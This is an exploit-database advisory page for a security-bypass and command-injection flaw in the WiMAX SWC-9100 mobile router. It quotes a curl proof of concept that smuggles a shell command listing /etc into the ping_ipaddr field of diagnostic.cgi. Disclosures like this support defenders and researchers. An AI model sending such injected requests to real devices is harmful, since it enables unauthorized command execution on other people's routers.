header-logo
Suggest Exploit
vendor:
SWC-9100 Mobile Router
by:
SecurityFocus
8,8
CVSS
HIGH
Security-Bypass and Command-Injection
78, 78
CWE
Product Name: SWC-9100 Mobile Router
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

WiMAX SWC-9100 Mobile Router Security-Bypass and Command-Injection Vulnerability

WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability. Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device. An attacker can send a specially crafted HTTP POST request to the vulnerable device containing malicious code in the ping_ipaddr parameter.

Mitigation:

Users should apply the latest available updates from the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/65306/info
 
WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability.
 
Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device.
 
curl -v --data "select_mode_ping=on&ping_ipaddr=127.0.0.1>/dev/null; ls 
-lash /etc%23&ping_count=1&action=Apply&html_view=ping" 
"http://www.example.com/cgi-bin/diagnostic.cgi" > /dev/null

Navigation

Suggest Exploit

Services By CQR